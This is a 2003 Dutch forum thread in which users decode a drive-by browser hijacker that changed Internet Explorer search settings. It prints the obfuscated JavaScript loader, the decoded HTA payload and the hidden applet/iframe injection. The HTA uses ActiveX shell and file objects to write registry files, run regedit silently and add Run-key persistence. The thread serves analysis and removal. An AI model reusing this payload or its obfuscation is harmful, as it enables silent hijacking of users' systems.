Toon posts:

Mysterieuze search bar in IE

Pagina: 1
Acties:

Verwijderd

Topicstarter
Onlangs werd ik na het bezoeken van een website automatisch gelinkt naar een
andere website, dat m'n IE op een sneaky manier heeft veranderd door een
stomme search bar te installeren. Ik realiseerde mij dit pas, nadat ik de volgende
dag m'n computer had opgestart. De registry was natuurlijk meteen de plek waar
ik als eerste op onderzoek ging.
Bij HLMSOFTWAREMicrosoftWindowsCurrentVersionRun zag ik de
Value name SystemSearch met Value data REGEDIT.EXE -s C:ie.reg staan.
Aha, dus even in de C: directory gekeken en jawel..daar zat de registry file ie.reg :(
Verdomd, hoe heeft men dit nou weer geflikt?! :/
Om een lang verhaal kort te houden. Ik heb ontdekt dat de volgende PHP pagina
deze registry key en file heeft geplaatst: zzz.hotsearchbox.com/x/count.php (bezoeken op eigen risico >:))

Aangezien het een PHP script betreft, zou je denken dat je de source niet kunt zien.
Toch wel, door de pagina naar je e-mail adres te sturen en zo de source te bekijken :)
Dit is (blijkbaar) de encrypted source:
var h=0;var q='';var str=">uetkrv@xct"q?ykpfqy0etgcvgRqrwr*+=
hwpevkqp"u*+}q0fqewogpv0dqf{0kppgtJVON"?")>qdlgev"fcvc?$1z1eqwpv40rjr$
@=q0ujqy*2.2.3.3.fqewogpv0dqf+=�u*+=>1uetkrv@";
eval(String.fromCharCode(119,104,105,108,101,32,40,104,60,
115,116,114,46,108,101,110,103,116,104,41,123,13,10,113,32,
43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,
97,114,67,111,100,101,40,115,116,114,46,99,104,97,114,67,
111,100,101,65,116,40,104,41,45,50,41,59,13,10,104,43,43,
59,13,10,125,13,10,100,111,99,117,109,101,110,116,46,119,
114,105,116,101,40,113,41,59))

[F_J_Kedit: enter na += en na rjr$ gezet, die horen er niet. Idem enters en spaties gezet in de cijferlijsten]

De inhoud na String.fromCharCode heb ik op de volgende manier kunnen achterhalen:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Zim Zala Bim</title>
<META http-equiv=Content-Type content="text/html; charset=windows-1252"></head>
<BODY>
<script language="JavaScript">
var Str=String.fromCharCode(119,104,105,108,101,32,40,
104,60,115,116,114,46,108,101,110,103,116,104,41,123,
13,10,113,32,43,61,32,83,116,114,105,110,103,46,102,
114,111,109,67,104,97,114,67,111,100,101,40,115,116,
114,46,99,104,97,114,67,111,100,101,65,116,40,104,41,
45,50,41,59,13,10,104,43,43,59,13,10,125,13,10,100,111,
99,117,109,101,110,116,46,119,114,105,116,101,40,113,41,59);

alert(Str);
</script>
</body>
</html>

Wat de volgende uitkomst gaf:
code:
1
2
3
4
5
while (h<str.length){
q += String.fromCharCode(str.charCodeAt(h)-2);
h++;
}
document.write(q);


Ik heb alleen niet via Google kunnen vinden hoe ik het eerste gekrabbel kan decoderen.
Vandaar dat ik mij dus tot jullie wend.
Wie o wie kan mij helpen om dit mysterie op te lossen?
Bij voorbaat dank! _/-\o_

[ Voor 29% gewijzigd door F_J_K op 23-10-2003 15:54 . Reden: en weer layout aangepast :* ]


  • momania
  • Registratie: Mei 2000
  • Laatst online: 15:19

momania

iPhone 30! Bam!

Ik heb je tekst even wat leesbaarder gemaakt ;)
(kijk even over er geen foutjes inzitten btw, mijn html rechten in combinatie met de code tag levert nogal problemen :X )

Verder is dit meer iets voor in Software Algemeen :)

[ Voor 34% gewijzigd door momania op 23-10-2003 15:36 ]

Neem je whisky mee, is het te weinig... *zucht*


Verwijderd

De gedecode text (waarde van q) is:
code:
1
2
3
4
5
6
7
8
<script>
var o=window.createPopup();
function s() {
o.document.body.innerHTML = '<object data="/x/count2.php">';
o.show(0,0,1,1,document.body);
}
s();
</script>

[ Voor 11% gewijzigd door Verwijderd op 23-10-2003 15:48 . Reden: typfoutje in script ]


Verwijderd

Topicstarter
Nee, het is goed zo, bedankt ;) Alleen die laatste smiley was niet te zien en heb even gecorrigeerd :)

Oh bedankt, Anjelen, hoe heb jij dat eigenlijk gedaan? :?

[ Voor 26% gewijzigd door Verwijderd op 23-10-2003 15:49 ]


  • Martijn02
  • Registratie: September 2000
  • Laatst online: 03-09 10:41

Martijn02

/* No Comment */

Let even op... het bekijken van de code is niet zo'n probleem, alleen wat je ziet is niet php-code. De pagina bevat een javascript.

En stiekum bevat dat javascript ook weer javascript. Wat jij in je 3e quootje neerzet is wat er draait, en dat doet dingen met die str die in het bovenste script gedefinieerd wordt.

Eens ff kijken of we het resultaat daarvan ook kunnen krijgen...

/edit: Hmm ben dus alweer te laat :)

Tja dat object... wat doet dat? daar wordt het voor mij ook een beetje duister...

[ Voor 15% gewijzigd door Martijn02 op 23-10-2003 15:50 ]


Verwijderd

Nou ik heb dus in count2.php zitten kijken .. de server zegt dat het een ".hta" document is .. wth dat mag zijn :)
Heb die gedownload, geopend in een text editor .. en het lijkt gewoon een stuk html te zijn... alleen deze heeft nog veel meer troep 8)7
Oh bedankt, Anjelen, hoe heb jij dat eigenlijk gedaan?
document.write(blaat) vervangen door alert(blaat)

.. Moet je wel alles overtypen :p (er zal vast een makkelijkere functie bestaan waar je kan copyen)
Tja dat object... wat doet dat? daar wordt het voor mij ook een beetje duister...
Het lijkt me een soort exploit dmv data bindings in IE .. 1 van de grootste gaten in IE trouwens.

[ Voor 48% gewijzigd door Verwijderd op 23-10-2003 15:52 ]


  • F_J_K
  • Registratie: Juni 2001
  • Niet online

F_J_K

Moderator CSA/PB/AI

Front verplichte underscores

offtopic:
Toch weer even de layout aangepast, als het zo onduidelijk is zou je de bron in bijv. een .txt bestand kunnen linken zodat het als 1 gehel te zien is. Maar zo was het 'redelijk' slecht te lezen :)

Edit: weer de _O_ gezet. Trouwens mooie topicstart :*

[ Voor 16% gewijzigd door F_J_K op 23-10-2003 17:19 ]

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)


  • Martijn02
  • Registratie: September 2000
  • Laatst online: 03-09 10:41

Martijn02

/* No Comment */

Hallelua
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
<HTA:APPLICATION BORDER="none" CAPTION="no" SHOWINTASKBAR="no"
 SYSMENU="no" WINDOWSTATE="Minimize">
<script>self.moveTo(15000,15000);</script>
<script>
var h=0;
var q='';
var str=">uetkrv@ugnh0oqxgVq*37222.37222+=>1uetkrv@>qdlgev"kf?)yuj)
"encuukf?)enukf<H;57FE44/3EH2/33F2/CFD;/22E26HF7:C2D)@>1qdlgev@
>qdlgev"kf?)huq)"encuukf?)enukf<2F65HG23/H2;5/33EH/:;62/22C2E;27644:)
@>1qdlgev@>uetkrv"ncpiwcig?luetkrv@vt{}xct"eqpv3?)
TGIGFKV6^p^p)-)]JMG
[aEWTTGPVaWUGT^^Uqhvyctg^^Oketquqhv^^Kpvgtpgv"Gzrnqtgt_^p)-)
$UgctejWTN$?$jvvr<11yyy0ugctejzn0eqo1kg1$^p^p)-)]JMG
[aEWTTGPVaWUGT^^Uqhvyctg^^Oketquqhv^^Kpvgtpgv"Gzrnqtgt^^Ockp_^p)-)
$Wug"Ugctej"Cuuv$?$pq$^p)-)$Wug"Ewuvqo"Ugctej"WTN$?
fyqtf<22222223^p)-)$FghcwnvaUgctejaWTN$?$jvvr<11yyy0ugctejzn0eqo1kg1
$^p)-)$Ugctej"Rcig$?$jvvr<11yyy0ugctejzn0eqo1kg1$^p)-)$Ugctej"Dct$?
$jvvr<11yyy0ugctejzn0eqo1kg1$^p)-)$UgctejWTN$?
$jvvr<11yyy0ugctejzn0eqo1kg1$^p)-)]JMG
[aEWTTGPVaWUGT^^Uqhvyctg^^Oketquqhv^^Kpvgtpgv"Gzrnqtgt^^Ugctej_^p)-
)$UgctejCuukuvcpv$?$jvvr<11yyy0ugctejzn0eqo1kg1$^p)-)]JMG
[aNQECNaOCEJKPG^^UQHVYCTG^^Oketquqhv^^Kpvgtpgv"Gzrnqtgt^^Ugctej_^
p)-)$UgctejCuukuvcpv$?$jvvr<11yyy0ugctejzn0eqo1kg1$^p^p)-)]JMG
[aEWTTGPVaWUGT^^Uqhvyctg^^Oketquqhv^^Kpvgtpgv"Gzrnqtgt^^Vqqndct^^Y
gdDtqyugt_^p)-)$KVDctNc{qwv$?
jgz<33.22.22.22.6e.22.22.22.22.22.22.22.52.22.22.22.3d.22.22.22.86.22.22.22.23.
22.22.22.c2.28.22.22.g;.24.22.22.27.22.22.22.84.26.22.22.48.22.22.22.24.22.22.2
2.c3.28.22.22.h9.24.22.22.26.22.22.22.c3.22.22.22.33.25.22.22.25.22.22.22.c;.24.
22.22.2d.25.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.2
2.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22
.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.
22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.2
2.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22
.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.
22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.2
2.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22
.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.
22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.2
2.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22
.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.
22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.2
2.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22
.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.
22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.2
2.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22.22
.22.22.22.22.22.22.23.46.f2.52.:3.8c.f2.33.:4.96.22.e2.6h.f7.cg.5:.22.22.22.22.22.2
2.22.22.22.22.22.22.22.22.22.22^p)=xct"hkngpcog3?$e<1kg0tgi$=
hkng"?"huq0qrgpvgzvhkng*hkngpcog3.4.vtwg.2+=hkng0ytkvg*eqpv3+=
hkng0enqug*+=xct"eqpv4"?)TGIGFKV6^p^p)-)]JMG
[aNQECNaOCEJKPG^^Uqhvyctg^^Oketquqhv^^Ykpfqyu^^EwttgpvXgtukqp^^Twp
_^p)-)$U{uvgoUgctej$?$TGIGFKV0GZG"/u"E<^^^^kg0tgi$^p^p)-)]JMG
[aNQECNaOCEJKPG^^Uqhvyctg^^Oketquqhv^^Eqfg"Uvqtg"Fcvcdcug^^Inqdcn"
Pcogurceg^^Lcxc"Rcemcigu^^eqo^^ou^^cevkxgz_^p)-)$Rcvj$?$c$^p)=
xct"hkngpcog4?$e<1c0tgi$=hkng"?
"huq0qrgpvgzvhkng*hkngpcog4.4.vtwg.2+=hkng0ytkvg*eqpv4+=
hkng0enqug*+=""""yuj0twp*$TGIGFKV0GZG"/u"$-hkngpcog4.$2
$.$HCNUG$+=ugvVkogqwv*$huq0FgngvgHkng*hkngpcog4+=$.5222+=
ugvVkogqwv*$ugnh0enqug*+=$.6222+=ecvej*g+}ugnh0enqug*+=
>1uetkrv@";

eval(String.fromCharCode(119,104,105,108,101,32,40,104,60,115,116,114,46,
108,101,110,103,116,104,41,123,13,10,113,32,43,61,32,83,116,114,105,110,103,
46,102,114,111,109,67,104,97,114,67,111,100,101,40,115,116,114,46,99,104,97,
114,67,111,100,101,65,116,40,104,41,45,50,41,59,13,10,104,43,43,59,13,10,125,
13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,113,41,59))
</script>
</body>
</html>

[ Voor 23% gewijzigd door Martijn02 op 23-10-2003 16:09 . Reden: Nog even wat leesbaarder maken ]


Verwijderd

Ja das dus de waarde van count2.php :P .. hoef je niet in 't geheel te pasten hier :)
En de grote vraag is dus .. wat zit daar allemaal te decoden in? :)

Edit:
Oh, 'tis groot maar in ieder geval leesbaar nu :)
Eventjes kijken wat dat allemaal is ...

[ Voor 40% gewijzigd door Verwijderd op 23-10-2003 15:59 ]


  • Martijn02
  • Registratie: September 2000
  • Laatst online: 03-09 10:41

Martijn02

/* No Comment */

Je gelooft het niet:

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<script>self.moveTo(15000,15000);</script>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<object id='fso' classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></object>
<script language=jscript>
try{
var cont1='REGEDIT4nn'+'[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]n'+'"SearchURL"="http://www.searchxl.com/ie/"nn'+'[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]n'+'"Use Search Asst"="no"n'+'"Use Custom Search URL"=dword:00000001n'+'"Default_Search_URL"="http://www.searchxl.com/ie/"n'+'"Search Page"="http://www.searchxl.com/ie/"n'+'"Search Bar"="http://www.searchxl.com/ie/"n'+'"SearchURL"="http://www.searchxl.com/ie/"n'+'[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]n'+'"SearchAssistant"="http://www.searchxl.com/ie/"n'+'[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]n'+'"SearchAssistant"="http://www.searchxl.com/ie/"nn'+'[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser]n'+'"ITBarLayout"=hex:11,00,00,00,4c,00,00,00,00,00,00,00,30,00,00,00,1b,00,00,00,64,00,00,00,01,00,00,00,a0,06,00,00,e9,02,00,00,05,00,00,00,62,04,00,00,26,00,00,00,02,00,00,00,a1,06,00,00,f7,02,00,00,04,00,00,00,a1,00,00,00,11,03,00,00,03,00,00,00,a9,02,00,00,0b,03,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,24,d0,30,81,6a,d0,11,82,74,00,c0,4f,d5,ae,38,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00n';

var filename1="c:/ie.reg";
file = fso.opentextfile(filename1,2,true,0);
file.write(cont1);
file.close();

var cont2 
='REGEDIT4nn'+'[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]n'+'"SystemSearch"="REGEDIT.EXE -s C:\\ie.reg"nn'+'[HKEY_LOCAL_MACHINE\Software\Microsoft\Code Store Database\Global Namespace\Java Packages\com\ms\activex]n'+'"Path"="a"n';

var filename2="c:/a.reg";

file = fso.opentextfile(filename2,2,true,0);
file.write(cont2);
file.close();
    wsh.run("REGEDIT.EXE -s "+filename2,"0","FALSE");

setTimeout("fso.DeleteFile(filename2);",3000);
setTimeout("self.close();",4000);
}catch(e){self.close();}
</script>


ps: dit maakt het leesbaar:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<HTML>
<form name=f>
<textarea name=t>
</textarea>
</form>
<script>
<!--
var h=0;
var q='';
var str="<veeltelange_loze_code>";

while (h<str.length)
{
  q += String.fromCharCode(str.charCodeAt(h)-2);
  h++;
}
document.f.t.value=q;
-->
</script>
</HTML>


/edit
Sorry voor de layout.

Dit is echt iets heel vaags... het lijkt er op alsof ze zo via jscript en 2 objecten
het filesysteem kunnen benaderen en een file kunnen uitvoeren op je pc. Ze
pakken het wel erg goed in (voor virusscanners?)

Mischien wel het zoveelste veiligheidslek in IE wat we hier te pakken hebben?

[ Voor 70% gewijzigd door Martijn02 op 23-10-2003 16:12 ]


Verwijderd

Topicstarter
Hmmm, heel interessant en leerzaam allemaal. Bedankt tot nu toe, getalenteerde mensen _/-\o_ We hebben volgens mij iets belangrijkst te pakken :)

Verwijderd

Of je hebt het toegestaan om ActiveX objecten te creeeren op die vage sites, of IE heeft weer een bug die dit soort praktijken toelaat }:|...

Ik denk het laatste want ze creeren het object niet op de gebruikelijke manier, maar door het aanroepen van de ClassId van het object.

De vraag is:

- Heb je IE geupdate ?
- Heb je je security settings in IE niet te slap ?
- Kijk je er vreemd van op dat je dit soort zooi in IE altijd zult hebben ? ( /me zit lekker met Mozilla Firebird te te browsen >:) )

  • LawnMowerMan
  • Registratie: Februari 2001
  • Laatst online: 12-08 13:27

LawnMowerMan

Wat een baggerfilm btw...

Het viel me wel op dat wanneer ik count2.php opent in de browser (dus "http://www.hotsearchbox.com/x/count2.php" en dan <enter>) hij vraagt of je em wilt downen of openen (standaard dialoog IE) en wanneer ik dan "openen" selecteer, dat Norton 2K3 direct begint te sputteren en mekkert over FileSystemObject en onveilig script.

Maar idd zeer ingenieus gedaan op deze manier...

Your ass is grass and I'm the lawnmower!


Verwijderd

Het werkt hier niet (laatste patches IE6 zijn geinstalleerd door auto update)
Dus waarschijnlijk heeft MS dit zelf ook al gerealiseerd..

  • Juup
  • Registratie: Februari 2000
  • Niet online
Als ik 'm de onveilige ActiveX component laat uitvoeren (beetje aangepast) dan schijft íe echt deze content naar c:\ie.reg:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.searchxl.com/ie/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Use Search Asst"="no"
"Use Custom Search URL"=dword:00000001
"Default_Search_URL"="http://www.searchxl.com/ie/"
"Search Page"="http://www.searchxl.com/ie/"
"Search Bar"="http://www.searchxl.com/ie/"
"SearchURL"="http://www.searchxl.com/ie/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.searchxl.com/ie/"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.searchxl.com/ie/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser]
"ITBarLayout"=hex:11,00,00,00,4c,00,00,00,00,00,00,00,30,00,00,00,1b,00,00,00,64,00,00,00,01,00,00,00,a0,06,00,00,e9,02,00,00,05,00,00,00,62,04,00,00,26,00,00,00,02,00,00,00,a1,06,00,00,f7,02,00,00,04,00,00,00,a1,00,00,00,11,03,00,00,03,00,00,00,a9,02,00,00,0b,03,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,24,d0,30,81,6a,d0,11,82,74,00,c0,4f,d5,ae,38,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00

Edit: lege newlines werken niet goed in code blok

[ Voor 11% gewijzigd door Juup op 23-10-2003 16:36 ]

Een wappie is iemand die gevallen is voor de (jarenlange) Russische desinformatiecampagnes.
Wantrouwen en confirmation bias doen de rest.


  • Domino
  • Registratie: Juli 1999
  • Laatst online: 10:31
Afbeeldingslocatie: http://picserver.student.utwente.nl/getpicture.php?id=430384

Internet Explorer 6 met SP1 op XP.

  • Martijn02
  • Registratie: September 2000
  • Laatst online: 03-09 10:41

Martijn02

/* No Comment */

Het openen van count2.php in je browser heeft geen zin. Dit is namelijk geen html maar een HTA, dat werkt alleen in een object tag. Als je het direct opent zal er niets bijzonders gebeuren.

Dit zijn trouwens de headers
code:
1
2
3
4
5
6
7
8
9
10
11
HTTP/1.1 200 OK
Date: Thu, 23 Oct 2003 14:25:37 GMT
Server: Apache/1.3.28 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.2 PHP/4.3.2 FrontPage/5.0.2.2634 mod_ssl/2.8.15 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.2
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 23 Oct 2003 14:25:37 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: application/hta


Daar zie je ook dat het Content-Type: application/hta is, en niet text/html

Verder valt op dat de server FrontPage plugins draait... :S

  • Juup
  • Registratie: Februari 2000
  • Niet online
Het gekke is dat hij filename2 wel probeert uit te voeren (dat is de a.reg) maar filename1 (ie.reg) niet.

Een wappie is iemand die gevallen is voor de (jarenlange) Russische desinformatiecampagnes.
Wantrouwen en confirmation bias doen de rest.


  • Martijn02
  • Registratie: September 2000
  • Laatst online: 03-09 10:41

Martijn02

/* No Comment */

Simpel... dan zie je de aanpassing niet meteen... Pas de volgende keer dat je de pc opstart wordt het veranderd.

Hoe is de topicstarter er eigenlijk achter gekomen van welke pagina dat ding komt?

Verwijderd

Een HTA bestand is een HTml Application. Een applicatie die je kan maken in jscript en DHTML. Er zitten wat extra features in om files te kunnen openen en de geinstalleerde activeX componenten te benaderen.
In short, HTAs pack all the power of Microsoft® Internet Explorer—its object model, performance, rendering power, protocol support, and channel–download technology—without enforcing the strict security model and user interface of the browser.

  • DeMoN
  • Registratie: Maart 2001
  • Laatst online: 12-03 14:25

DeMoN

Pastafari

Lezen als je wilt weten hoe eng .HTA kan zijn:

http://archives.neohapsis...uln-dev/2001-q1/0762.html
What the above does is create an attachment, which in this case is an
*.hta file, but by manipulating the content-type, it is given an image
file icon. We then include in the body of our email message the very
simple code to execute whatever we wish, which is automatically
incorporated into the manufactured attachment.
Is een voorbeeldje... :/

[ Voor 55% gewijzigd door DeMoN op 23-10-2003 17:14 ]

Gamertag: Cosmicv0id
"Het woord Gods is voor mij niets meer dan een expressie en het product van menselijke zwakheid. De Bijbel is een verzamelwerk van legendes die achtenswaardig zijn maar ook primitief en kinderachtig.'' - Albert Einstein


Verwijderd

Het openen van count2.php in je browser heeft geen zin.
I dare to question that..
Ach ja, daar is vmware ook voor bestemd, maar ik raad het niemand aan om met z'n gewone sys te doen..

Verwijderd

Topicstarter
Martijn02 schreef op 23 oktober 2003 @ 16:47:
Hoe is de topicstarter er eigenlijk achter gekomen van welke pagina dat ding komt?
Tja, goeie vraag. Ik ben m'n route aan het checken om te kijken hoe ik het ontdekt heb. Er zat in de map .jpi_cache\file\1.0 een counter-blablabla.idx en idem zip bestand, wat ik heb uitgepakt. Hierin zaten VerifierBug.class, Go.class, Dummy.class, BB.class en een map genaamd META-INFO met een MANIFEST.MF file.

Wat ik mij verder herinner is, dat ik in m'n Temporary Internet Files was gaan zoeken naar de betreffende website met behulp van het tijdstip waarop ie.reg in m'n C: directory werd geplaatst. In de betreffende HTML code van die website stond helemaal onderaan het volgende:
code:
1
2
3
4
5
6
7
<APPLET=20 height=0 archive=real/counter width=0 code=BB.class>
<PARAM NAME="height" VALUE="1"><PARAM NAME="archive" VALUE="real/counter">
<PARAM NAME="width" VALUE="1"><PARAM NAME="code" VALUE="BB.class">
<PARAM NAME="codeBase" VALUE="http://www.hotsearchbox.com/hoi/"></APPLET>
<IFRAME=20 src="/x/count.php" width=0 height=0></IFRAME>
<SCRIPT>window.open('http://www.searchxl.com/dir.php','_blank','fullscreen=1');
</SCRIPT>

  • Spice
  • Registratie: Augustus 2000
  • Laatst online: 09-01 14:46

Spice

- Mijn vader is een tovenaar -

Ik heb ook al een tijdje iets geks onder mijn search zitten. Wanneer ik ie aanzet zag ik heel snel even searchxl in beeld. Ik heb net als de poster alle updates, misschien active X uitzetten dan maar. De oplossing (weghalen) staat gewoon op de site van searchxl (onderaan).
link: http://www.searchxl.com/search_uninstall.reg

Just call me angel of the morning, angel. Just touch my cheek before you leave me, baby. Just call me angel of the morning, angel.

Pagina: 1